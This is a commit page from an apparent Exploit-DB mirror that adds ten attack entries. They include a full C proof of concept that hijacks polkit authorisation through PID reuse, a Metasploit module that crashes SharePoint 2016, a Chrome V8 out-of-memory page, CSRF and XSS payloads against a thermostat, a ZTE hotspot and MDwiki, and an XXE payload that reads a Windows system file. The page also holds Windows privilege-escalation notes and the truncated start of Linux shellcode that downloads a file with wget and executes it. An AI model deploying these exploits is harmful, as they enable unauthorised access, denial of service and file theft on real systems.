bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-01-10

Browse source 
10 changes to exploits/shellcodes

Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC)
Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)
polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork
Microsoft Windows - Windows Error Reporting Local Privilege Escalation
Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion
MDwiki < 0.6.2 - Cross-Site Scripting
Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)
ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting
BlogEngine 3.3 - XML External Entity Injection

Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)
This commit is contained in:
Offensive Security 2019-01-10 05:01:43 +00:00
parent 0b8f4f786a
commit c2a1585898
12 changed files with 852 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
exploits/hardware/webapps/46100.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery
# Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan
# Date: 2019-01-09
# Exploit Author: sajjadbnd
# Vendor Lnk: https://www.heatmiser.com/en/
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
# Tested on: Heatmiser Version 1.7
# CVE: N/A
# [+] CSRF: Change Admin Username and Password
<form method="post" name="config" action="http://target:8083/networkSetup.htm">
Name:<input type="text" name="usnm" maxlength="16" value="s" onchange="textchange()">
Password:<input type="password" maxlength="16" style="width:150px;" name="usps" >
Confirm User Password:<input type="password" maxlength="16" style="width:150px;" name="cfps" onchange="textchange()">
<input id="btnSubmit" type="submit" class="sm" value=" Save " onclick="saveclick()">
</form>

21
exploits/hardware/webapps/46102.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Reflected Cross-Site Scripting on ZTE MF65
# Date: 01/09/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009483
# Version: BD_HDV6MF65V1.0.0B05
# Tested on: Windows 10 x64
# CVE: CVE-2018-7355
*Description
The Mobile Hotspot having the said firmware version doesnt sanitize the input argument "cmd" used in the page "/goform_get_cmd_process". A malicious input held by the parameter in the URL could result to client-side script execution or HTML code injection.
*Proof of Concept
http://192.168.0.1/goform/goform_get_cmd_process?multi_data=1&isTest=false&cmd=<b>ZTE_MF65_HTML_INJECT</b>
http://192.168.0.1/goform/goform_get_cmd_process?multi_data=1&isTest=false&cmd=<script>alert(1)</script>
*Mitigation
None - ZTE recommends upgrading to a new product (http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009483)

385
exploits/linux/dos/46105.c Normal file
View file

@ -0,0 +1,385 @@
/*
When a (non-root) user attempts to e.g. control systemd units in the system
instance from an active session over DBus, the access is gated by a polkit
policy that requires "auth_admin_keep" auth. This results in an auth prompt
being shown to the user, asking the user to confirm the action by entering the
password of an administrator account.
After the action has been confirmed, the auth decision for "auth_admin_keep" is
cached for up to five minutes. Subject to some restrictions, similar actions can
then be performed in this timespan without requiring re-auth:
- The PID of the DBus client requesting the new action must match the PID of
the DBus client requesting the old action (based on SO_PEERCRED information
forwarded by the DBus daemon).
- The "start time" of the client's PID (as seen in /proc/$pid/stat, field 22)
must not have changed. The granularity of this timestamp is in the
millisecond range.
- polkit polls every two seconds whether a process with the expected start time
still exists. If not, the temporary auth entry is purged.
Without the start time check, this would obviously be buggy because an attacker
could simply wait for the legitimate client to disappear, then create a new
client with the same PID.
Unfortunately, the start time check is bypassable because fork() is not atomic.
Looking at the source code of copy_process() in the kernel:
p->start_time = ktime_get_ns();
p->real_start_time = ktime_get_boot_ns();
[...]
retval = copy_thread_tls(clone_flags, stack_start, stack_size, p, tls);
if (retval)
goto bad_fork_cleanup_io;
if (pid != &init_struct_pid) {
pid = alloc_pid(p->nsproxy->pid_ns_for_children);
if (IS_ERR(pid)) {
retval = PTR_ERR(pid);
goto bad_fork_cleanup_thread;
}
}
The ktime_get_boot_ns() call is where the "start time" of the process is
recorded. The alloc_pid() call is where a free PID is allocated. In between
these, some time passes; and because the copy_thread_tls() call between them can
access userspace memory when sys_clone() is invoked through the 32-bit syscall
entry point, an attacker can even stall the kernel arbitrarily long at this
point (by supplying a pointer into userspace memory that is associated with a
userfaultfd or is backed by a custom FUSE filesystem).
This means that an attacker can immediately call sys_clone() when the victim
process is created, often resulting in a process that has the exact same start
time reported in procfs; and then the attacker can delay the alloc_pid() call
until after the victim process has died and the PID assignment has cycled
around. This results in an attacker process that polkit can't distinguish from
the victim process.
I have attached a reproducer as slowfork.c. Usage:
Compile:
$ gcc -o slowfork slowfork.c -pthread -O2
As user A, run it:
$ ./slowfork
No output appears at this point.
As user B, run "systemctl stop cups.service". When the auth prompt comes up,
wait a few seconds, then enter the required password.
If the attack worked, user A should show see something like this:
======
got uffd msg
good pagefault
old start time: 2454277
awaiting death of 16466...
cycling...
cycling done
cycling...
cycling done
scanning for previous free PID
looping PID (going for 16465)
resolving pagefault
clone result (positive): 16466
new start time: 2454277
child died, exiting
======
cups.service should be running afterwards because the PoC running as user A
restarted it.
Sometimes the attack fails because the start time of the attacker process is off
by one ("old start time" and "new start time" don't match); in that case, user
A will get an auth popup. It tends to work after a few tries for me.
(The attack would likely work much more reliably if the PoC triggered the
sys_clone() on victim process creation; at the moment, it only triggers when the
victim process calls execve().)
Tested on Ubuntu 18.04.
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <dirent.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <err.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <signal.h>
#include <stdio.h>
#include <sched.h>
#include <asm/ldt.h>
#include <errno.h>
#include <stdbool.h>
static int uffd;
static void *uf_mapping;
static int target_pid = -1;
static char exit_stack[0x2000];
static int exit_fn(void *dummy) {
syscall(__NR_exit, 0);
}
static pid_t consume_pid(void) {
pid_t loop_pid = clone(exit_fn, exit_stack+sizeof(exit_stack),
CLONE_FILES|CLONE_FS|CLONE_IO|
CLONE_SIGHAND|CLONE_SYSVSEM|
CLONE_VM|SIGCHLD, NULL);
if (loop_pid == -1) err(1, "clone");
int status;
pid_t res = wait(&status);
if (res != loop_pid) err(1, "wait");
return loop_pid;
}
static pid_t consume_pids(void) {
pid_t loop_pid;
for (int i=0; i<10; i++) {
loop_pid = clone(exit_fn, exit_stack+sizeof(exit_stack),
CLONE_FILES|CLONE_FS|CLONE_IO|
CLONE_SIGHAND|CLONE_SYSVSEM|
CLONE_VM|SIGCHLD, NULL);
if (loop_pid == -1) err(1, "clone");
}
for (int i=0; i<10; i++) {
int status;
pid_t res = wait(&status);
if (res == -1) err(1, "wait");
}
return loop_pid;
}
static pid_t last_pid_for_ns(void) {
char buf[20];
int fd = open("/proc/sys/kernel/ns_last_pid", O_RDONLY);
int res = read(fd, buf, sizeof(buf)-1);
if (res <= 0) err(1, "ns_last_pid read");
close(fd);
buf[res] = 0;
return atoi(buf);
}
static void *continue_thread(void *dummy) {
struct uffd_msg msg;
int res = read(uffd, &msg, sizeof(struct uffd_msg));
if (res != sizeof(struct uffd_msg)) err(1, "uffd read");
printf("got uffd msg\n");
if (msg.event != UFFD_EVENT_PAGEFAULT) errx(1, "bad event");
if (msg.arg.pagefault.address != (unsigned long)uf_mapping)
errx(1, "bad address");
printf("good pagefault\n");
char stat_path[100];
sprintf(stat_path, "/proc/%d/stat", target_pid);
int s_fd = open(stat_path, O_RDONLY);
char s_buf[1000];
int read_res = read(s_fd, s_buf, sizeof(s_buf)-1);
close(s_fd);
if (read_res > 0) {
s_buf[read_res] = 0;
char *cs_p = s_buf;
for (int i=1; i<22; i++) {
cs_p = strchr(cs_p, ' ');
if (cs_p == NULL) errx(1, "bad stat");
cs_p++;
}
long start_time_old = strtol(cs_p, NULL, 10);
printf("old start time: %ld\n", start_time_old);
}
printf("awaiting death of %d...\n", target_pid);
while (1) {
int res = kill(target_pid, 0);
if (res == -1 && errno == ESRCH) break;
// ensure that we're always within ~100 PIDs
bool printed = false;
while (1) {
pid_t last = last_pid_for_ns();
if (last < target_pid && last > target_pid - 100)
break;
if (!printed) {
printf("cycling...\n");
printed = true;
}
consume_pids();
}
if (printed)
printf("cycling done\n");
usleep(10000);
}
printf("scanning for previous free PID\n");
pid_t child_search_pid = target_pid - 1;
while (1) {
if (child_search_pid <= 2) errx(1, "can't handle underflow");
int res = kill(child_search_pid, 0);
if (res == -1 && errno == ESRCH) break;
child_search_pid--;
}
printf("looping PID (going for %d)\n", child_search_pid);
while (1) {
pid_t loop_pid = consume_pid();
if (loop_pid == child_search_pid) break;
}
printf("resolving pagefault\n");
union {
struct user_desc data;
char pad[0x1000];
} ldt_desc = { .data = {
.entry_number = 14,
.read_exec_only = 1,
.seg_not_present = 1
} };
struct uffdio_copy copy = {
.dst = (unsigned long)uf_mapping,
.src = (unsigned long)&ldt_desc,
.len = 0x1000,
.mode = 0
};
if (ioctl(uffd, UFFDIO_COPY, &copy)) err(1, "copy");
if (copy.copy != 0x1000) errx(1, "copy len");
return NULL;
}
int main(void) {
// Documentation for userfaultfd:
// http://man7.org/linux/man-pages/man2/userfaultfd.2.html
// http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html
// https://blog.lizzie.io/using-userfaultfd.html
uffd = syscall(__NR_userfaultfd, 0);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = 0xAA, .features = 0 };
if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
uf_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_32BIT, -1, 0);
if (uf_mapping == MAP_FAILED) err(1, "mmap");
struct uffdio_register reg = {
.range = {
.start = (unsigned long)uf_mapping,
.len = 0x1000
},
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");
pthread_t ct;
if (pthread_create(&ct, NULL, continue_thread, NULL)) errx(1, "thread");
// Wait for the legitimate task to spawn.
DIR *proc_dir = opendir("/proc");
if (proc_dir == NULL) err(1, "opendir");
while (1) {
rewinddir(proc_dir);
struct dirent *dent;
while ((dent = readdir(proc_dir)) != NULL) {
if (dent->d_name[0] < '0' || dent->d_name[0] > '9')
continue;
char comm_path[30];
sprintf(comm_path, "/proc/%s/comm", dent->d_name);
char comm[20];
int comm_fd = open(comm_path, O_RDONLY);
if (comm_fd == -1) continue;
ssize_t res = read(comm_fd, comm, 19);
if (res < 0)
comm[0] = 0;
else
comm[res] = 0;
close(comm_fd);
if (strcmp(comm, "systemctl\n") == 0) {
target_pid = atoi(dent->d_name);
break;
}
}
if (target_pid != -1) break;
}
// Call clone() *through the 32-bit syscall API*.
unsigned long clone_flags = CLONE_SETTLS | SIGCHLD;
unsigned long tls_val = (unsigned long)uf_mapping;
int clone_result;
asm volatile(
"mov $120, %%rax\n\t"
"mov %[clone_flags], %%rbx\n\t"
"mov $0, %%rcx\n\t" //newsp
"mov $0, %%rdx\n\t" //parent_tidptr
"mov %[tls_val], %%rsi\n\t"
"mov $0, %%rdi\n\t" //child_tidptr
"int $0x80\n\t"
"mov %%eax, %[clone_result]\n\t"
: // out
[clone_result] "=m"(clone_result)
: // in
[clone_flags] "m"(clone_flags),
[tls_val] "m"(tls_val)
: // clobber
// 32-bit entry path zeroes the 64-bit-only registers
"r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
// syscall args and retval
"rax", "rcx", "rdx", "rsi", "rdi",
// misc stuff
"memory", "cc"
);
if (clone_result < 0) {
printf("clone result (negative): %d\n", clone_result);
return 1;
}
if (clone_result == 0) {
/*
while (1) syscall(__NR_pause);
*/
char *argv[] = {
"systemctl",
"start",
"cups.service",
NULL
};
syscall(__NR_execve, "/bin/systemctl", argv, environ);
syscall(__NR_exit, 1);
}
printf("clone result (positive): %d\n", clone_result);
char child_stat_path[100];
sprintf(child_stat_path, "/proc/%d/stat", clone_result);
int cs_fd = open(child_stat_path, O_RDONLY);
char cs_buf[1000];
int read_res = read(cs_fd, cs_buf, sizeof(cs_buf)-1);
close(cs_fd);
if (read_res > 0) {
cs_buf[read_res] = 0;
char *cs_p = cs_buf;
for (int i=1; i<22; i++) {
cs_p = strchr(cs_p, ' ');
if (cs_p == NULL) errx(1, "bad stat");
cs_p++;
}
long start_time_new = strtol(cs_p, NULL, 10);
printf("new start time: %ld\n", start_time_new);
}
int status;
if (wait(&status) != clone_result)
err(1, "wait");
printf("child died, exiting\n");
return 0;
}

34
exploits/multiple/dos/46099.html Normal file
View file

@ -0,0 +1,34 @@
<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-12-23
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A
# Description:
# Fatal javascript OOM in CALL_AND_RETRY_LAST
# https://bugs.chromium.org/p/chromium/issues/detail?id=917631
-->
<html>
<head>
<script>
function main() {
var vArr = new Array();
var bigArray = new Array(0x20000000);
vArr[0] = String.prototype.toLowerCase.call(bigArray);
vArr[1] = String.prototype.toLowerCase.call(bigArray);
vArr[2] = String.prototype.toLowerCase.call(bigArray);
}
</script>
</head>
<body onload=main()></body>
</html>

70
exploits/multiple/webapps/46097.md Normal file
View file

@ -0,0 +1,70 @@
Originally thought that only a problem with Tencent's site implementation, the black brother reminded me to look at the Github address in the source code, only to find the open source [MDwiki](https://github.com/Dynalon/mdwiki) universal system. (MDwiki is a wiki/CMS system built entirely on HTML5/Javascript technology and runs entirely on the client. No special server software is required, just upload mdwiki.html to the directory where you store the markdown files.) The problem occurs when the program gets the location The .hash value (normally test.md) is parsed and the ajax request is dynamically added to the page.
## MDwiki.min.js
Decompressing the compressed JavaScript is easy to debug, and the confusion variable is temporarily ignored, n() :
```
function n() {
var b;
b = window.location.hash.substring(window.location.hash.startsWith("#!") ? 2 : 1), b = decodeURIComponent(b);
var c = b.indexOf("#"); - 1 !== c ? (a.md.inPageAnchor = b.substring(c + 1), a.md.mainHref = b.substring(0, c)) : a.md.mainHref = b
}
```
The variable b gets the value after location.hash #! and URLDecode , which is then assigned to a.md.mainHref .
## ajax getURL
```
var d = {
url: a.md.mainHref,
dataType: "text"
};
a.ajax(d).done(function (a) {
b = a, c()
}).fail(function () {
var b = a.md.getLogger();
b.fatal("Could not get " + a.md.mainHref), c()
})
```
The content will be requested by a.md.mainHref, and the b variable will be a:page content after completion.
```
var e = d(b);
a("#md-content").html(e), b = "";
var g = a.Deferred();
f(g), g.always(function () {
c()
})
```
e = d(b), b requires equal to Payload, chase d function:
```
function d(b) {
var c = {
gfm: !0,
tables: !0,
breaks: !0
};
"original" === a.md.config.lineBreaks ? c.breaks = !1 : "gfm" === a.md.config.lineBreaks && (c.breaks = !0), marked.setOptions(c);
var d = marked(b);
return d
}
```
The e value is dynamically added to #md-content after being rendered by the d function > marked(b) function, causing a vulnerability.
## PoC
We can construct a page to write to Payload and set the ACCESS-CONTROL-ALLOW-ORIGIN header:
```
cat test/mdwiki.php
<?php
header("ACCESS-CONTROL-ALLOW-ORIGIN:*");
?>
<script>alert(location.href)</script>
```
eg: http://dynalon.github.io/mdwiki/mdwiki.html#!http://server.n0tr00t.com/test/mdwiki.php

151
exploits/windows/dos/46101.rb Executable file
View file

@ -0,0 +1,151 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'sharepoint-ruby'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DOS Vulnerability in SharePoint 2016 Server',
'Description' => %q{
A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
The vulnerability is a result of the dependency SharePoint has in Microsoft.Data.OData library which was
vulnerable to remote DOS (See CVE-2018-8269). The exploit is done by sending a crafted request that contains
an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will
terminate the process that runs the server. By default, SharePoint server is configured to recover a
terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5
minutes interval, the server will not recover and will be down until it is manually restarted.
},
'Author' =>
[
'Gil Mirmovitch', # Vulnerability discover and poc
'Gal Zror' # Metasploit module
],
'Platform' => 'win',
'References' =>
[
[ 'CVE', '2018-8269' ],
[ 'ALEPH', '2018002' ]
],
'Targets' =>
[
[ 'Microsoft Office SharePoint Server 2016', { } ],
],
))
register_options(
[
Opt::RPORT(443),
OptString.new('SSL', [true, 'Negotiate SSL/TLS for outgoing connections', true]),
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with']),
OptString.new('VHOST', [true, 'HTTP server virtual host'])
], self.class)
end
def fetch_auth_cookie
print_status("Fetching Authentication Cookie")
begin
site = Sharepoint::Site.new vhost, 'server-relative-site-url'
site.session.authenticate datastore['USERNAME'], datastore['PASSWORD']
return site.session.cookie
rescue Sharepoint::Session::AuthenticationFailed
fail_with(Failure::NoAccess, "Authentication failed")
end
print_good("Authentication Succeeded")
end
def extract_digest_value(cookie)
token_api_uri = '/_api/contextinfo'
res = send_request_cgi( {
'method' => 'POST',
'uri' => normalize_uri(token_api_uri),
'cookie' => cookie,
})
if res.nil?
fail_with(Failure::UnexpectedReply, "Empty context response")
end
res.get_xml_document.xpath('//d:FormDigestValue').text
end
def send_dos_request
send_request(6100)
end
def send_innocent_request
send_request(5)
end
def send_request(reps)
vuln_api_uri = "/_api/$batch"
cookie = datastore['COOKIE']
data = Rex::MIME::Message.new
data.add_part(
"GET /_api/web/lists?$filter=true" + "+or+true" * reps + " HTTP/1.1\r\n" +
"accept: application/json;odata.metadata=minimal\r\n", #Data is our payload
'application/http', #Content Type
'binary', #Transfer Encoding
nil #Content Disposition
)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(vuln_api_uri),
'ctype' => "multipart/mixed; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'headers' => {
'x-requestdigest' => extract_digest_value(cookie),
}
})
end
def dos
print_status("Sending DOS malicious requests...")
(0..10).each {|i|
print_status("Countdown #{10 - i}...")
send_dos_request
sleep(60)
}
end
def check
datastore['COOKIE'] = fetch_auth_cookie
print_status("Sending innocent request...")
res = send_innocent_request
if res && res.code == 200
print_good("Server responded 200 to innocent request")
else
print_bad("Server response " + res.code.to_s + " to innocent request")
return Exploit::CheckCode::Unknown
end
print_status("Sending malicious request...")
res = send_dos_request
if res.nil?
Exploit::CheckCode::Vulnerable
else
print_bad("Server response " + res.code.to_s + " to malicious request")
Exploit::CheckCode::Safe
end
end
def run
if check == Exploit::CheckCode::Vulnerable
dos
end
end
end

16
exploits/windows/local/46098.txt Normal file
View file

@ -0,0 +1,16 @@
Make sure to copy the file report.wer found in the folder PoC-Files in the same folder as the executable before running it... I guess I could have included it as a resource in the exe.. but whatever.
Example: "angrypolarbearbug.exe c:\windows\system32\drivers\pci.sys"
This will overwrite pci.sys with trash.
Couldn't repo on one core.
It can take a little for the bug to win race..
It might straight up not work on some CPUs.. I don't know..
You need an internet connection. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
It's a non security issue really. You should have partial control over the write (change string fields in report.wer maybe?) .. I havn't tested.. but in theory if you can dump some script in it and overwrite filetypes that potentially execute it, that could be interesting.
You can also use it to perhaps disable third party AV software..
Windows defender will be harder since those files can only be modified by trusted installer, not even system.
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46098.rar

37
exploits/windows/local/46104.txt Normal file
View file

@ -0,0 +1,37 @@
Windows: DSSVC CheckFilePermission Arbitrary File Delete EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
The Data Sharing Service doesnt has a TOCTOU in PolicyChecker::CheckFilePermission resulting in an arbitrary file deletion.
Description:
In many different places the DSSVC calls PolicyChecker::CheckFilePermission to ensure the calling user has permission to open a file with a certain set of access rights. This function has an unusual behavior, specifically it passes OPEN_ALWAYS as the disposition to CreateFile even if the code expects the file to already exist. The OPEN_ALWAYS disposition will create a file if it doesnt exist, to handle the the code checks whether GetLastError() is 0, if it is then it assumes the file is new and so will call DeleteFile on the path.
This has a big problem, theres a TOCTOU in that the path passed to CreateFile doesnt need to refer to the same file thats passed to DeleteFile. For example when this method is called in DSSCreateSharedFileTokenEx its using the path supplied by the user almost directly. One way of exploiting this would be to specify a path with a mount point in it, then between the call to CreateFile and DeleteFile change the mount point to point somewhere else.
However, theres an easier way, as CreateFile is called under impersonation and DeleteFile is not an attacker could just setup a per-user C: redirection to force the CreateFile call to open a new file in an arbitrary directory, then when DeleteFile is called itll be out of the impersonation so will use the system supplied C: drive.
Fixing wise you should probably reopen the original file for DELETE access then use the native APIs to delete the file by handle. Also if the file is expected to exist you perhaps should have a flag passed which indicates to use OPEN_EXISTING instead of OPEN_ALWAYS an not try and delete the file anyway.
Proof of Concept:
Ive provided a PoC as a C# project.
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC passing the path to a file the user cant delete on the command line (but can be deleted by SYSTEM).
Expected Result:
The call to DSOpenSharedFile fails and the file isnt deleted.
Observed Result:
The file specified is deleted.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46104.zip

40
exploits/windows/webapps/46106.txt Normal file
View file

@ -0,0 +1,40 @@
XML External Entity Injection Vulnerability in BlogEngine 3.3
Information
--------------------
Advisory by Netsparker
Name: XML External Entity Injection Vulnerability in BlogEngine 3.3
Affected Software: BlogEngine
Affected Versions: 3.3
Homepage: https://blogengine.io/
Vulnerability: XML External Entity (XXE) Injection Vulnerability
Severity: High
Status: Not Fixed
CVE-ID: 2018-14485
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
Netsparker Advisory Reference: NS-18-045
Technical Details
--------------------
Url: http://websiteurl-blogengine3.3/metaweblog.axd
Parameter Name: BodyXML
Parameter Type: POST
Attack Pattern: <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
Advisory Timeline
--------------------
12th November 2018- First Attempt to Contact
9th January 2019 - Advisory Released
Credits & Authors
--------------------
These issues have been discovered by Mustafa YalASSA+-n while testing Netsparker Web Application Security Scanner.
About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

9
files_exploits.csv
View file

@ -6239,6 +6239,9 @@ id,file,description,date,author,type,platform,port
46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46096,exploits/multiple/dos/46096.txt,"Wireshark - 'get_t61_string' Heap Out-of-Bounds Read",2019-01-08,"Google Security Research",dos,multiple,
46099,exploits/multiple/dos/46099.html,"Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC)",2019-01-09,"Bogdan Kurinnoy",dos,multiple,
46101,exploits/windows/dos/46101.rb,"Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)",2019-01-09,"Gal Zror",dos,windows,443
46105,exploits/linux/dos/46105.c,"polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork",2019-01-09,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10190,6 +10193,8 @@ id,file,description,date,author,type,platform,port
46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows,
46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,
46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40580,3 +40585,7 @@ id,file,description,date,author,type,platform,port
46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,
46094,exploits/php/webapps/46094.py,"CF Image Hosting Script 1.6.5 - (Delete all Pictures) Privilege Escalation",2019-01-08,"David Tavarez",webapps,php,80
46095,exploits/php/webapps/46095.txt,"Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection",2019-01-08,"Mehmet Onder",webapps,php,80
46097,exploits/multiple/webapps/46097.md,"MDwiki < 0.6.2 - Cross-Site Scripting",2017-03-02,evi1m0,webapps,multiple,
46100,exploits/hardware/webapps/46100.txt,"Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)",2019-01-09,SajjadBnd,webapps,hardware,
46102,exploits/hardware/webapps/46102.txt,"ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting",2019-01-09,"Nathu Nandwani",webapps,hardware,80
46106,exploits/windows/webapps/46106.txt,"BlogEngine 3.3 - XML External Entity Injection",2019-01-09,Netsparker,webapps,windows,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -928,3 +928,4 @@ id,file,description,date,author,type,platform
45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86

1 id file description date author type platform
928 45980 shellcodes/linux_x86/45980.c Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes) 2018-12-11 T3jv1l shellcode linux_x86
929 46007 shellcodes/linux_x86-64/46007.c Linux/x64 - Disable ASLR Security Shellcode (93 Bytes) 2018-12-19 Kağan Çapar shellcode linux_x86-64
930 46039 shellcodes/linux/46039.c Linux/x86 - Kill All Processes Shellcode (14 bytes) 2018-12-24 strider shellcode linux
931 46103 shellcodes/linux_x86/46103.c Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes) 2019-01-09 strider shellcode linux_x86

71
shellcodes/linux_x86/46103.c Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: Linux/x86 wget chmod execute over execve /bin/sh -c shellcode (119 bytes)
# Google Dork: None
# Date: 08.12.2018
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 119
------------------------------[Description]---------------------------------
This shellcode use execve syscall to run /bin/sh -c which executes wget to download a file from a your server.
After download it executes chmod 777 to your downloaded file and execute your file
-----------------------------[Shellcode Dump]---------------------------------
section .text
global _start
_start:
xor eax, eax
push eax
jmp short _execline
